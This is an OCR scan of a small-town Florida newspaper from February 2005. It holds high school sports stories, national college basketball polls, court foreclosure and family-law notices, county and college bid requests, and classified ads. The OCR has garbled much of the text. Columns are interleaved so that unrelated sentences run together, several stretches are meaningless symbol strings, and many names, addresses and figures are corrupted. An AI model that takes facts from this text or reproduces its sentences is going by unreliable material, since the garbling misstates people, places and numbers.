e, 401K, Uniforms, Paid Vacation. Late " Model Equipment. Apply in person Mon.- Fri. between 3pm and 6pm @ Johnson & Johnson Inc. 1607 US 90 East Madison, Florida 32340 con- tact person Ronnie Blanton. EXP. CDL-A DRIVERS NOW IS THE TIME LET'S TALK!! Mesilla Valley Transportation 1-800-944-4544 100 Job SOpportunities 01550876 Plumbers UNIVERSITY OF SFLORIDA The University of Florida, Department of Housing and Residence Education, is currently recruiting for three plumbers. Minimum requirements include completion of an approved apprenticeship program in plumbing, or a high school diploma and four years of appropriate experience. Appropriate vocational/technical training may substitute at an equivalent rate for the required experience. These positions maintain and install a variety of plumbing and heating systems and fixtures. Preferred candidates will have knowledge .of the procedures and methods for installing, repairing, and' maintaining plumbing and heating fixtures and accessories; and be skilled in use of pipe cutters, reamers, threading machines and other specialized tools and equipment..Expected starting salary for these positions is $10.50 hourly; may exceed based on experience. To view application instructions and complete an online resume, please visit. Reference numbers: 29010, 29019, and 31169. The deadline date to apply is February 24, 2005. If an accommodation due to. a disability is needed to apply for this position, please call (352) 392-4621 or the Florida Relay System at (800) 955-8771 (TDD). An Equal Opportunity Institution.. 2 PAINTERS needed. Work in town/out of town. Will train Call Clay 386-397-5706 or 386-752-8977 A/C Service Technician Commercial .Full iinii iidl vehicle andbenefits.,. Drug Free, EOE. Mail resume to: Climate Control Mechanical Ser'v- ices, 737 S.W. 57th Ave., Ocala, FL 34474 or call 1-800-546-0085 Another Way, Inc. is seeking a shelter manager, outreach advocate and various part time positions. Full time positions are available with benefits. Formally battered women and minorities encouraged to apply. Fax resume to 386-719-2758 by February 18, 2005 Rohnie. Harvey at 386-752-2583 Or fax resume to: 386-752-8724 Liberty National is an EOE Licensed Agents Welcome How can we top being est Call Center of the/CuslomerHENTL@GIC kA ' vww-clientlogicxcom The service engine of the new @conomy'm 100 Job 100 'Opportunities ACCOUNTING CLERK Large company is in search of an experienced Accounting Clerk. Qualified candidate must be experi- enced in AP/AR, Billing and Month-end close procedures. Must be proficient in Word and Excel, good oral/communication skills are a must! Please forward resumes to: Accounting Clerk P.O. Box 1829 Lake City, FL 32056 ATTN: Diane Polbos ACCOUNTING MANAGER LAKE CITY AREA MUST HAVE B.A. DEGREE 3 YEARS WORKING EXP AS ACCOUNTING SUPERVISOR OR STAFF ACCOUNTING REQUIRED GREAT GROUNDFLOOR OPPORTUNITY RESUMES TO: WS4140@EARTHLINK.NET Addresses wanted immediately! No experience necessary. Work at home. Call toll 405-447-6397 ALUMINUM SCREEN Room Installers needed. Must have valid drivers license. Call for appt. 386-755-5779 Auto Body Technician High Volume, New Shop. Highest Quality. Immediate openings E'cellent Annual Income. 386-755--4018 40U(earthlink.net DANIEL'S TOWING & Recovery 386-755-5154. Wanted Driver. Must have Class A CDL. 25 yrs. or older. Mechanical Knowledge a plus. Apply in person ONLY. Cii,. IJ '-.2i5,:, . Dump Truck Dri %ers Wanted Class A or B license Contact V&J's at 386-497-1080 100 Job 100 'Opportunities Exp. COOKS Apply in person. Beef O'Brady's 857 SW Main Blvd. Exp. framing carpenters & helpers. Come join a great crew. Must have transportation. Interviews call 386- 623-5057 or 365-8073 before 8pm Experienced GA Mechanic. A/P license required. IA helpful. Live Oak. Fax resume to: 386-845-0243 EXPERIENCED INSULATORS needed. Must have reliable transpor- tation and be able to work overtime. Class D CDL license a plus. Call 386-758-3995 for appt. Receptionist needed. Must be.people oriented w/ exc. phone skills. Apply in person at Still Waters. 507 NW Hall of Fame Dr. HIRING FOR all positions at the Porter House Grill. Apply in person Between 3-5pm Mon, Tue, or Wed. 894 SW Main Blvd. Lake City. HOTEL SEEKING dependable, friendly employees with smiles. Housekeepers, front Desk clerk (must be fle\ible ki h outgoing per- sonality), & part time maintenance (must have exp.) Apply in person Jameson Inn, 285 SW Commerce Drive. No phone calls please. INDUSTRIAL FORKLIFT EXPERIENCE SHIPPING & RECEIVING LIFTING REQULiiRED 386-755-1991 WAL-STAF PERSONNEL BACKGRD/DRUGSCREEN REQ. INSURANCE CSR Our busy Lake City Agency needs an exp'd CSR, 220 or 440 Licensed. Great pay & benefits. Fax resume to: 72t7-943-0022 or e-mail to: grubg(ibrookecorp.com MASON OR Mason Apprentice needed. Must have own transportation. Call 386-466-0000 MYSTERY SHOPPERS NEEDED! Earn While You Shop! C.111 WN.-. T11 P7-- alu Now Toull Free , 1-888-255-6040 Ext. 13252 P Needed delivery driver for the ; i- Gainesville Sun in Lake City area. ( Early morning hours. 7 days a week. 'J For info, call Cindy 352-338-3148 - WORK AT HOME! Be a Medical Transcriptionist * Come to this free, no obligation seminar to find Ear out how with no previous experience you can learn to work at home doing medical transcription EI$ from audio cassettes dictated by doctors! High Demand! Doctors Need Transcription uis at 7 PM. I. This ad is your seminar ticket A72 I CLIP OUT AND BRING TO, SEMINAR AT 7 PM. CLIP Lake City. Quality Inn 3559 W. US Highway 90 Lake City, Fla. 32055 S-- 2001 Lowe Street, Fort Collins, CO 80525 with experience incredible commissions & bonuses V Qualify for complete benefits package SUNBELT HONDA Apply in person Mon.-Fri., 9am-4pm; See Tony Business Attire, Come Dressed to Begin Training Hwy 41 S., Lake City No Phone Calls Please I- Walt's Live Oak Ford-Mercury Looking for experienced salespeople or rig t people with no experience. Will train. *Up to 35% commissions *Demo program for salespeople *Health Insurance *Great working environment *Paid 3% on F&Il *Paid salary during training Please call Bobby Coqswell at 386-362-1112 , )1 LAKE CITY REPORTER, TUESDAY, FEBRUARY 15, 2005 100 Job 0 Opportunities onen page resume to 386-961-8802. PART-TIME GRANT FUNDED HOMELESS SERVICES COORDINATOR This contractual position requires completing grant requirements, attending monthly meetings, corre- spondence, advocacy on behalf of the homeless. Da I 10 da\ operation interacting & assisting clients. Applicant should have good communication skills and knowl- edge of the social service agencies. Send resume to: 258 NW Burk Ave- nue, Lake City, FL 32055 or fax to 386-754-5325. PROFESSIONAL CHILD Care worker with CDA looking to expand into management. Mail resume to P.O. Box 2127, Lake City, Fl. 32056 ROUTE DRIVER WANTED. Class B license required. Apply online at. S ILES POSITION MUST HAVE STRONG SALES EXPERIENCE PLEASE CALL FOR APPT. WAL-STAFF PERSONNEL 386-755-1991 DrugScre'en & backgrd Req. Santa Fe Truss We are currently in need of a Tru s Repair Technic i.n Prior experience. preferred. Willing to train individual with similar construction e\peri- ence The right candidate k ill pos- -ess sironga .inLile ical and communi- cation skds, miust be e,.trenmiel) S self motivated. A valid Florida driver's license is required, Job also requires .*casi.,rial heaj. lift- ing and the abili[, to .. ork at <.ai, - ing heights. We offer competitive pay and benefits. DFWP. Qualified applicants should contact us in person only at 410 SW Poe,Springs Rd, High Springs Sante Fe Truss We are'currently hiring truss builderss ard -a.. cre. personnel Prior experience required. We offer qualified indit\ dua.s great production it( bonuses, competia e pay. and benefits DFWVP. SApp', in person onl) at SS\: 410 S Po Spring; Road High Springs. SONNY'S B-B-Q is Now hiring Exp. Managers in Like Citi. Also other Florida locations ai ail Sumbit resume in peron or mail to 10731 SW 66th Ci Ocala. FL 344.17,6 EOE D/F.'\/P SOUTHEASTERN METAL \\elder-> needed. Now taking applicahons in production. ,elding. S"S-$15 per hour call 3S6-75S-7757 SURVEYING Help needed. SEperienced Intrunment Person & E' perenced Draftismni. Call during business hours 38'6-' 5-9,S31 TRAV EL U*S*A E',citingtS Firrin Has 10 Imniedi- ate Openings f':ri sharp Gu.s && Gals Free to travel all major cities & resort areas. Mu_-.t be IS Years of age & older Must be free to start to- da. \\e offer 2 i, ceks paid training. transportation furnished. return guaranteed For inter, ien Call Mr. Kenmore 5 3.%6-152-6262 Wed Fri iUam to 5pm Truck Drivers \\anted CDL ClIa A required 2 years experience Good Pa'i. horne .eekends. , (3s 2(4-3 172 Wallh' Lite Oak Foird i.. looking for ar experienced To' Truck Dri'er. Must have Class D License. Includes benefits. Call Rick 380-362:1112 lf.r appt. EOE W ANTED EXPERIENCED \\ait stalt for A Place In The Park Cate. \Whie Spnngs. 386-.3L-141 I or 3S6-752-1952 ,ANTED! WANTED! WANTED! HARDWORKERS ONLY NEEDAPPL1. \LL SHIFTS MUST BE ABLE TO LIFT 50ILBS-7IILBS 3S6-55-1Pu91 WAL-STAF PERSON N E L REQ. , %$ANTED!!! ASSISTANT EXPERIENCED WITH TILE AND MARBLE MUST BE ABLE TO LIFT UPTO70LBS . PLEASE CALL FOR APPT. WAL-STAFF PERSONNEL 386-755-1991 Drug Screen & Backgrd Req. WAREHOUSE BODY PARTS OF AMERICA seeks team oriented, hardworking individuals. Health, dental, life in-' surance available. lMonda\ -Frida\. If you are not afraid of lionest. hard work. Apply in person at: 385 SW Arlington Rd, Lake City (no phone calls please.) %\ INDOl\ ser' ice technician needed. Experience a plus but not necessary. Must have knot ledge of Lake City, Gainesville & Nlacclen- ny areas and be able to lift heavy objects. Good benefits orfeied .ftier 90 days (100% employee medical & life Ins.), 401 K & vacation offered after 1 yr. of employment Pick up application at Lake City Ihdustries, 250 Railroad Street. I 100 Jobare a safe, dependable driver, Class A CDL, clean MVR. Part time & full time- drivers needed. Home every night, weekends off. Good benefits. Columbia Grain 755-7700 0n Sales Employment EXPERIENCED FLOORING sales person needed. Top Pay. Call Brad or Martha at 386-362-7066 ORLANDO WELCOME Center on US 90, Lake City. is looking for .sales people. Commission base only. Contact Wilma. 38s6-- -4.250 01548 37 REGISTERED NURSES SHANDS AT LAKE SHORE the folio,, ing positions .ire current, a' ailable and ,ke are seeking qualified apphcanis OB ICU ER MED/SURG RN Per Diem Pool $26.00 per hour plus shift differential. For more informanon contact Human Resources at 386-754-8147, Appl in person at 368 NE Franklin St, Lake City, Flonda '32'5 .:r '. i ii oui '. ebziic ai ; %;,; % h.ands.org. EOE, M/F/D/V. Drug Free Workplace 01550723 CNA Advent Christian Village 658-JOBS (5627) Certified Nursing Assistants! The Ad ent Christian Village is looking for FT and PT CNAs who want to give quality care. Florida certification required. Great work- ing en' irornileni. Compeuti e sal- ar,.. Compeii'. e be'rielfit for FT po t: .n'rs mclid.: h':,':ith d.;ntal, life, disability, savings, AFLAC supplemental policies, access to onsite daycare and fi'tess facili- ties. EOE; Drug Free Workplace, Criminal background checks re- quired. Apply in person at ACV Personnel Department Mon thru Fri. 9-i0 a m a until 4:00 p.m., Car- ier Village Hall. 11:65h0 CR 136. Do ling Park, FL, ta'.. resume 1to (386) 658-5160; or visit S. PT Physical Therapy Assistant Avalon Healthcare Center is currently accepting applications for a part time Ph sical Therapist .ssisiant. Qualified candridate must be State Licensed. If \ou v. ant to .%orl; in an en\ ironmrient[ i-.here caring trulh make a difference, please contract Tony Anderson, Administrator Avalon Healthcare Center 1270 S.W. laiin Bld lake City, FL 32025 386-752-7900 Drug Free Workplace OT & LPTA Positions Advent Christian Village 658-JOBS for Current opportunities , PT PTA to assist utiih phsmrcal therapist phi sical rehabilitation and related acti ties. Valid Florida PTA license required. Prior experience preferred. PT OT to assist for long-term care facitti,. Valid Florida OT license required Prior experience preferred. EOE; Drug Free Workplace. Criminal background verification required Apply in person at ACV Personnel Department -Mon. - Fri. 9:00 a.m. .until 4.00 p.m., Carter Village Hall, 1068i0 CR 136, Dowling Park, FL. Fax resume to (386)658-5160 or visit. Per-on. Dental terminology a must. Live Oak/Lake City. $9.25 hr. Fax resume to: 386-961-9086 RN CLINICAL COORDINATOR Lake Cit,, Medical (-'enter ha this posiorn open: F. T rpighls. Require- ments are: RN License, BLS Certifi- cation arnd pre ,ous e'p pielerre.J Please apply in person at: Lake City Medical Center, Human Resources, 340 NW Commerce Dr. Lake City, FL 32055. 1 0 Medical 12 Employment FulI MEDICAL OFFICE 1 day a week . Wednesday only 386-755-14-S Now Hiring FT Dietary Technician for 180-bed LTC facility e\penence preferred s.lanr based on training & experience. contact Bette Forshaw NHA @ 386-362-7860 or apply in person Suwannee Health Care Center 1620 E Helvenston Street Live Oak, Florida 32064 EOE, DV, M/F SUlWANNEE MEDICAL Personnel LPN needed 3-11 & weekends in Lake Citv area ask for Theresa or Nlelissa 1-877-755-1544 or 755-1544 LAB PUPPIES For Sale 8 weeks old w/hc and Vacs. 1 Female & 4 Males, Black 3S6-752-9649 310 Pels & Supplies 1 WC adult. gray rat snake 5.i - .. 3,.,6-69r -314 ' 2 Jungle Carpet Pithons imale'fe- male pair $300: 3S6-697-3147 4'X3' WOOD+PLEXI cage $120-all OBO 697-31I 7 55 GALON aquarium+ top& stand 100. 3S6-69"-314-7 FREE PUPPIES 8 Weeks old, 'Boxer / Texas leopard mix. 386-755-7729 PUBLISHERS NOTE Florida La' 82.'2.-. requires dogs and cats being sold to be at least 8 0..eeks old and have a health certifi- cate from a licensed veterinarian documenting they have mandatory shots and are free from, intestinal and e\[ernal parasites. Many species of wildlife must be licensed by Flor- ida Fish and Wildlife. If \ou are un- sure. contact the local office for in- tornmation Valentine Pomeranian Puppies 8 weeks, Health Cert.,3 males/ 1 female 386-758-5525 401 Antiques ANTIQUE BRASS Bed 5250or best offer. 3?6-719-3846 Primili e table. Pegs, walnut. $125. or best offer. 386-719-38-16 408 Furnilure 4x8 Glass PATIO TABLE %wih four chairs $15i0 386-752-9500 ( Bedroomiset. Lt. Bitch color. exe. cond. IncI queen sz. h,'board. chest of draw.er. I night stand. I dresser % flamed mirror $60.i '54.-0156 416 Sporting Goods REGULATION POOL Table All accessories. 52500 i755-341 I.MAGN.A~ OX 42" Color Console TV w/. surround sound capability Good cond $-50 . 3S6-755-10.1i3 386-288-8x 33 420 Wanted to Buy K&H TIMBER Timber Co. Pai ment in ad\ dance for standing pine timber. Large or small tracts. Call 386-758-7636. 430 Garage Sales PUBLISHER'S NOTE SErfectue October I. "'103 All Yard Sale Ads must be prepaid 440 Miscellaneous 01548548 DIRECT SATELLITE S\ stems Installed free no equipment 1o buy Call 961-8415 GUNSHOW Feb. 19 & 20th 9a 4p. Columbia Co. Fairgrounds. Hwy 247. Lake City. Concealed Weapons classes twice daily: Info 904-461-0273 NEW single GARAGE Door. Auto open or 2 remotes 386-466-1818 630 Mobile Homes o for Rent 2BR.'2BA. 1/2 furnished. SecItided on 1 jcie. 1st, lasI & secturN\. i .55 mo. 386-_'. -_1h1 )or 3 s8 -623-5117 Avail. at Waynes R\ Resort 2 or 3 Br MH.. incl. alter. se, er. cable TV. pest service & laudry. Call foi more details. 386-752-5721 30 Mobile Homes for Rent IN PARK Mobile Homes for Rent 2BR/2BA 1st & sec. required. Applications & references required. 386-719-2423 Lake City &Ellisville area 3br/2ba, & 2br/lba. MH's. Several avail. Water garbage & yard. $400 mo. $200 security. 386-963-1568 LATE MODEL MOBILE HOMES Starting $365 month, Beautiful Pond setting, w/trees. CH/A & ca- ble. No pets. Call 386-961-0017 640 AMobile Homes 640 for Sale 2002 FLEETWOOD. Custom made 28x76. Mint cond. 5br/4ba, all appl., Take over payments of $405/mo. & move. (352)628-7303 FQR AS LITTLE AS $500 DOWN @ 386-752-7751 If you own land, or, have a large down payment. I may owner finance a home fot you! Call Steve 386-365-8549 NO MONEY DOWN! New 2005 doubles ide On your land $33 4.i fi per month. Call Lee 3S6-36i-.s,,,. One of j kind Manufactured Log Home 4 bd1room Perfect for a :ounr, seurnig Call Jim 3.86-303-1557 THANK YOU! From all the Freedom Homes Family TIMBERLANE MHP. Adult park in Lake City 3br/2ba. Split plan DWMIH w/big kitchen & Ig shed. All appliances 269 SW Woodberry Ct. $36,000 386-75,8-9640 TRIPLE WIDE ON 17 ACRES IN OLD TOWN CALL BOBBY @ 386-752-7751 WE HAVEiFHA, VA & CONVENTIONAL LOAN PROGRAMS. WITH LOW DOWN. CALL 1-800-355-9385 We love CASH! We will give you the very best price for a new or used manufactured home! 386-752-5355 - WE SPECIALIZE IN LAND HOME PACKAGES 386-752-7751 650 Mobile Home 650 m &Land . & While Springs. Pos-ible le'se opt. 386-752-1212 0ori 305-309 L AND and HOME pjckjges, c lose to Lake City, it's %\ hati e do best' Paved street, city water and sewer,. Sou pick the home, we do the rest and Freedom Homes may owner fi-- nance! 386-752-5355 REMODELED manufactured home on land. Call Ron 386-397-40h0 TRIPLEWIDE on 1.8 acres land .MUST SELL!! 386-397-4930 ask for Faye 705 Rooms for Rent ROOMNIAE WANTED. $325 a month for e' erything. 386-697-6117 710 Unfurnished Apt. l/ For Rent $NO RENT UNTIL MARCH! 2BR and 3 BR Special. Call Today! New Apartment homes include MW, DW, pool, fitness center and much mote, Call Windsong ? 5S- S 45 ? 1550639 NOW LEASING 1 BedroomApartments/2BA W/ Loft. $675 mo plus security. 386-752-9626 NEWLY PAINTED 2br/lba w/garage, $650.mo. & 2br/lba w/out garage, $500mo plus security deposit. Lea.386-752-9626 Accepting Applications Good, Bad & No Credit Call for 1st & 2nd Mortgages Established full service co. (800) 226-6044 WE BUY MORTGAGES 2622 NW 43rd St. ^JMl~ #A-1 FHANVNA/Conv. Specialist Gainesville, FL 32606 GAINESVILLE MORTGAGE COMPANY, INC. Licensed Mtg. Lender 710 Unfurnished Apt. 7 For Rent X-CLEAN 2/2 1700 sq. ft. Second floor. Private country acre. Energywise. 7 miles to VA. $600. mo. $1,500. needed. 386-961-9181 720 Furnished Apts. SFor Rent Completely Furnished, clean, private, near City & Timco. 1BR. APT. Nice neighborhood. Quiet & peaceful. Call 386-755-3950 Neat as a Whistle! 1BR Hot Tub, 2 car garage. Nice Residential development. $895./mo. Close to Branford Hwy & 242. Call 386-397-5222 3BR/2BA HOUSE for rent. 1st, last & deposit required. Call 386-755-6867, for more information. Avail. Now! 3/2.1864 SE CR 245A Lake Citr. Big -u d. screened porch, big laundrN rm.new apple. $700 dep. $800 mo. Judy904-814- 2855 or912-843-8151 PUBLISHER'S NOTE All real estate advertising in this newspaper 'is subject to the Fair Housing Act which makes it illegal to d,:lerti se "any preference. limita- tion discrimrninaon based on race, color, religion. .e\. disablli. fami- lial status or national origin, or any intention to make such preference, limitation or discrimination." Fami- lial status includes children under the age of 18 I ingn mi.. t parents or legal custodians. pregnant women, and people securing custody of chil- dren under 18. This newspaper will not kno\i ing1l ,accept any advertising for real estate which is in violation of the law. Our readers are hereby informed that all dwellings advertised in this newspa- per are a a.ablbei on an equal oppor- runini basis. To complain of dis- crimination call HUD toll-free'at 1- 800-669-9,777. The toll free tele- phone number to the hearing im- paired is 1-800-927-9275 750 Business & ,5J Office Rentals' Building for Lease 2128 SW Main Blvd., Suite 105 Approx 1200 sq ft., Utilities Incl. $950. per month 386-752-5035 A Bar Sales Inc. DaN\s '7n--'pm OFFICE SPACE for lease 1,000 sq. ft. for prof. office. Downtown location. Call Sandy. 386-344-0433 Daniel Crapps Agency. 805 Lots for Sale HILLTOP HOMESITE on paved road in restricted communJn). Over- looks natural woodlands on creek. Onlk $4c,900 for acres 386-752-5035 Ext.9710. SD\ s 7am- 7prr A Bar Sale'. Inc. STA R LAKE ESTATES. 1/2 to 3/4 ac. Lake access, restricted home sites. 2 miles from I-75 & US 90. from $26,900. 386-365-1563 or 365-8007 810 Home for Sale $29,900! 4br/2ba foreclosure available noa ' Foi li sung call 1-s.:10-7-19- 124 e.[ H411 3BR/2BA HOUSE w/ garage. 8x12 Storage shed. Quail Ridge estates. 1/3 acre in quiet neighborhood. $96,500 neg. 386-935-0253 3BR/2BA LR-DR, kitchen equip- ped, back porch, patio, 2 car garage, 1603.sq ft. 14x38 RV garage, en- closed & outbuilding. 386-755-2190 FSBO New Home 3BR/2BA 1,400 sq ft, 1/3 acre, CHA, Kit; appl., off Country Club Rd, asking $115,000. call 386-867-0124 or 386-867-4 In1 SINGLE STOR1 Townhouse 2BR/2BA, Desirable neighborhood, perfect for retirees, Ceramic tile Kit/Bath, City Water & sewer, Just off SW Grand- Sview St. 79,500 386-755-0210 WE BUY Houses & Land & Fixer uppers! Call for more information. 386-7/55-6092 820 Farms & Acreage 5, 10 and 20 acre lots with well and septic tank. Owner financing. 386-752-4339 BEAUTIFUL 5 ac restricted home sites on paved road. 3 & 1/2 miles from 1-75 & US 90. From $48,900. 386-365-1563 or 365-8007 870 Real Estate Wanted WE PAY CASH for cut over timber land. 386-365-3865. 92 Auto Parts 92 & Supplies 00 OLDS Alero., Silver PW, PL. Nice car. Call Andy 356-'v5 -- 1"I 01 IMPALA LS BLACK. PW, PL, TILT. SC-LLANDY 386-758-6171 02 Chr3 sler PT Cruiser 4 door, black, PW, PL Call Andy 386-758-6171 02 FORD Escape. PW, PL. New Car trade. Call Andy 386-758-6171 03 G( L ANT P\V.PL. tilt, Cruise. Come Drive It! Call Andy 386-758-6171 03 NISSAN Sentra. loaded. Auto \%/ Alloys Exc. fuel miles.Onlyv 36K mi. Like New. $12,000. Please call Jimmy @ 386-752-5050 1992 GEO PRISM Parts Onl $1. 11j, C3all L35-0509 .. 35 MPG & Dell CPU Bu\ a 2005 Focus Hatch, Sedan, or Wagon get up to $2,500 rebate & a free Dell System Call today 386-623-1946 87 TOYOTA CAMRY. AUTO- MATIC. $1099. 386-466-1818 98 CADILLAC Deville. All the Toys. E\c. Cond. Lihr Pwr seats. Alloys. $16.100. Please call Jimm\ @ 386-752-5050. LO\ EST PRICES of the year! Lncoln Na' gator. Lincoln Aviator, Ford E'.pedmon. Lincoln LS, Ford TBird Call Todja 951 Recreational Vehicles" 04 FRANKLIN 39' 5th wheel. 2br 3 ele. slide outs. Garden tub/shower, '\asheri dier Stereo & CD. Every option. 525.5110 Cell (Sn2 i6S--h)%6 95 Savanalh, 33ft. 5th wheel, new hitch inc. Sleeps 6, Super Slide, Fully loaded. 1 owner. New tires. Owned by non-smoker. $11,950 obo, Will deliver. 386-288-9031 '952 Vans & Sport Util. Vehicles 1996 FORD Windstar. Needs work. $500. obo. 386-963-5201 evenings. 963-5953 Days. 1999 GMC JIMMY V-6 Loaded, New tires $5,500. 386-755-1053 SIT SEVEN Brand new 2004 Mercury Monterray. Leather, Power, rear doors, keyless remote. $12,000 off! 3 left 386-623-1946. 752-3300 . *' '\ b Contact Us | Permissions | Preferences | Technical Aspects | Statistics | Internal | Privacy Policy © 2004 - 2011 University of Florida George A. Smathers Libraries.All rights reserved. Acceptable Use, Copyright, and Disclaimer Statement Powered by SobekCM
http://ufdc.ufl.edu/UF00028308/00042
CC-MAIN-2016-50
refinedweb
24,619
75.71
I sometimes work in a very diferent way, I group classes in files by their propose, and use namespaces and regions to give order. It has it drawbacks, I know. even if I'm doing wrong, It is posible to have more than a class in a single file, what if you have more than one partial class in the same file? how will you group them? I vote for Lables in the solution explorer, with automatic labels for partial class. you choose a label, you only see the files of that label. <--- Another way may be have some name convention (i think you have), and add an option to filter files by partial name. <--- Or both. <---- Thank you for your feedback. This is an excellent suggestion. This is very much the way that WinForms and ASP.Net pages seperate out the user code from the designer code. However, we are currently at the end of our developement cycle. And we do not have time to fit this in. I am going to close this suggestion as "Won't Fix" and we will take a look at it again during out next product cycle. Thanks, Chuck England Visual Studio Platform Program Manager - Project & Build
https://connect.microsoft.com/VisualStudio/feedback/details/378781/c-partial-classes-solution-explorer
CC-MAIN-2018-05
refinedweb
204
83.25
remark-license remark plugin to generate a license section. Contents - What is this? - When should I use this? - Install - Use - API - Types - Compatibility - Security - Related - Contribute - License What is this? This package is a unified (remark) plugin to generate a license section such as the one at the bottom of this readme. unified is a project that transforms content with abstract syntax trees (ASTs). remark adds support for markdown to unified. mdast is the markdown AST that remark uses. This is a remark plugin that transforms mdast. When should I use this? This project is useful when you’re writing documentation for an open source project, typically a Node.js package, that has one or more readmes and maybe some other markdown files as well. You want to show the author and license associated with the project. When this plugin is used, authors can add a certain heading (say, ## License) to documents and this plugin will populate them. Install This package is ESM only. In Node.js (version 12.20+, 14.14+, or 16.0+), install with npm: npm install remark-license import remarkLicense from '' In browsers with Skypack: <script type="module"> import remarkLicense from '' </script> Use Say we have the following file example.md in this project: # Example Some text. ## Use ## API ## License And our module example.js looks as follows: import {read} from 'to-vfile' import {remark} from 'remark' import remarkLicense from 'remark-license' main() async function main() { const file = await remark() .use(remarkLicense) .process(await read('example.md')) console.log(String(file)) } Now running node example.js yields: # Example Some text. ## Use ## API ## License [MIT](license) © [Titus Wormer]() 👉 Note: This info is inferred from this project’s package.jsonand licensefile. Running this example in a different package will yield different results. API This package exports no identifiers. The default export is remarkLicense. unified().use(remarkLicense[, options]) Generate a license section. In short, this plugin: - looks for the heading matching /^licen[cs]e$/ior options.heading. - if there is a heading, replaces it with a new section options Configuration (optional in Node.js, required in browsers). options.name License holder ( string). In Node.js, defaults to the author field in the closest package.json. Throws when neither given nor detected. options.license SPDX identifier ( string). In Node.js, defaults to the license field in the closest package.json. Throws when neither given nor detected. options.file File name of license file ( string, optional). In Node.js, defaults to a file in the directory of the closest package.json that matches /^licen[cs]e(?=$|\.)/i. If there is no given or found license file, but options.license is a known SPDX identifier, then the URL to the license on spdx.org is used. options.url URL to license holder ( string, optional). In Node.js, defaults to the author field in the closest package.json. http:// is prepended if url does not start with an HTTP or HTTPS protocol. options.ignoreFinalDefinitions Ignore definitions that would otherwise trail in the section ( boolean, default: true). options.heading Heading to look for ( string (case insensitive) or RegExp, default: /^licen[cs]e$/i). 7+. Security options.url (or author.url in package.json) is used and injected into the tree when it’s given or found. This could open you up to a cross-site scripting (XSS) attack if you pass user provided content in or store user provided content in package.json. This may become a problem if the markdown is later transformed to rehype (hast) or opened in an unsafe markdown viewer. Related remark-collapse– make some sections collapsible remark-contributors– generate a contributors section remark-toc— generate a table of contents remark-usage— generate a usage example Contribute See contributing.md in remarkjs/.github for ways to get started. See support.md for ways to get help. This project has a code of conduct. By interacting with this repository, organization, or community you agree to abide by its terms.
https://unifiedjs.com/explore/package/remark-license/
CC-MAIN-2022-05
refinedweb
658
52.87
Nanolog is an extremely performant nanosecond scale logging system for C++ that exposes a simple printf-like API. Nanolog is an extremely performant nanosecond scale logging system for C++ that exposes a simple printf-like API and achieves over 80 million logs/second at a median latency of just over 7 nanoseconds. How it achieves this insane performance is by extracting static log information at compile-time, only logging the dynamic components in runtime hotpath, and deferring formatting to an offline process. This basically shifts work out of the runtime and into the compilation and post-execution phases. For more information about the techniques used in this logging system, please refer to either the NanoLog Paper published in the 2018 USENIX Annual Technical Conference or the original author's doctoral thesis. This section shows the performance of NanoLog with existing logging systems such as spdlog v1.1.0, Log4j2 v2.8, Boost 1.55, glog v0.3.5, and Windows Event Tracing with Windows Software Trace Preprocessor on Windows 10 (WPP). Maximum throughput measured with 1 million messages logged back to back with no delay and 1-16 logging threads (NanoLog logged 100 million messages to generate a log file of comparable size). ETW is "Event Tracing for Windows." The log messages used can be found in the Log Message Map below. Measured in nanoseconds and each cell represents the 50th / 99.9th tail latencies. The log messages used can be found in the Log Message Map below. | Message | NanoLog | spdlog | Log4j2 | glog | Boost | ETW | |---------|:--------:|:--------:|:--------:|:--------:|:--------:|:--------:| |staticString | 7/ 37| 214/ 2546| 174 / 3364 | 1198/ 5968| 1764/ 3772| 161/ 2967| |stringConcat | 7/ 36| 279/ 905| 256 / 25087 | 1212/ 5881| 1829/ 5548| 191/ 3365| |singleInteger | 7/ 32| 268/ 855| 180 / 9305 | 1242/ 5482| 1914/ 5759| 167/ 3007| |twoIntegers | 8/ 62| 437/ 1416| 183 / 10896 | 1399/ 6100| 2333/ 7235| 177/ 3183| |singleDouble | 8/ 43| 585/ 1562| 175 / 4351 | 1983/ 6957| 2610/ 7079| 165/ 3182| |complexFormat | 8/ 40| 1776/ 5267| 202 / 18207 | 2569/ 8877| 3334/ 11038| 218/ 3426| Log messages used in the benchmarks above. Italics indicate dynamic log arguments. | Message ID | Log Message Used | |--------------|:--------| |staticString | Starting backup replica garbage collector thread | |singleInteger | Backup storage speeds (min): 181 MB/s read | |twoIntegers | buffer has consumed 1032024 bytes of extra storage, current allocation: 1016544 bytes | |singleDouble | Using tombstone ratio balancer with ratio = 0.4 | |complexFormat | Initialized InfUdDriver buffers: 50000 receive buffers (97 MB), 50 transmit buffers (0 MB), took 26.2 ms | |stringConcat | Opened session with coordinator at basic+udp:host=192.168.1.140,port=12246 | Currently NanoLog only works for Linux-based systems and depends on the following: * C++17 Compiler: GNU g++ 7.5.0 or newer * GNU Make 4.0 or greater * Python 3.4.2 or greater * POSIX AIO and Threads (usually installed with Linux) The NanoLog system enables low latency logging by deduplicating static log metadata and outputting the dynamic log data in a binary format. This means that log files produced by NanoLog are in binary and must be passed through a separate decompression program to produce the full, human readable ASCII log. There are two versions of NanoLog (Preprocessor version and C++17 version) and you must chose one to use with your application as they’re not interoperable. The biggest difference between the two is that the Preprocessor version requires one to integrate a Python script in their build chain while the C++17 version is closer to a regular library (simply build and link against it). The benefit of using the Preprocessor version is that it performs more work at compile-time, resulting in a slightly more optimized runtime. If you don’t know which one to use, go with C++17 NanoLog as it’s easier to use. The C++17 version of NanoLog works like a traditional library; just #include "NanoLogCpp17.h"and link against the NanoLog library. A sample application can be found in the sample directory. To build the C++17 NanoLog Runtime library, go in the runtime directory and invoke make. This will produce ./libNanoLog.ato against link your application and a ./decompressorapplication that can be used to re-inflate the binary logs. When you compile your application, be sure to include the NanoLog header directory ( -I ./runtime), link against NanoLog, pthreads, and POSIX AIO ( -L ./runtime/ -lNanoLog -lrt -pthread), and enable format checking in the compiler (e.g. passing in -Werror=formatas a compilation flag). The latter step is incredibly important as format errors may silently corrupt the log file at runtime. Sample g++ invocations can be found in the sample GNUmakefile. After you compile and run the application, the log file generated can then be passed to the ./decompressorapplication to generate the full human-readable log file (instructions below). The Preprocessor version of NanoLog requires a tighter integration with the user build chain and is only for advanced/extreme users. It requires the user's GNUmakefile to include the NanoLogMakeFrag, declare USRSRCS and USROBJS variables to list all app’s source and object files respectively, and use the pre-defined run-cxxmacro to compile ALL the user .cc files into .o files instead of g++. See the preprocessor sample GNUmakefile for more details. Internally, the run-cxxinvocation will run a Python script over the source files and generate library code that is specific to each compilation of the user application. In other words, the compilation builds a version of 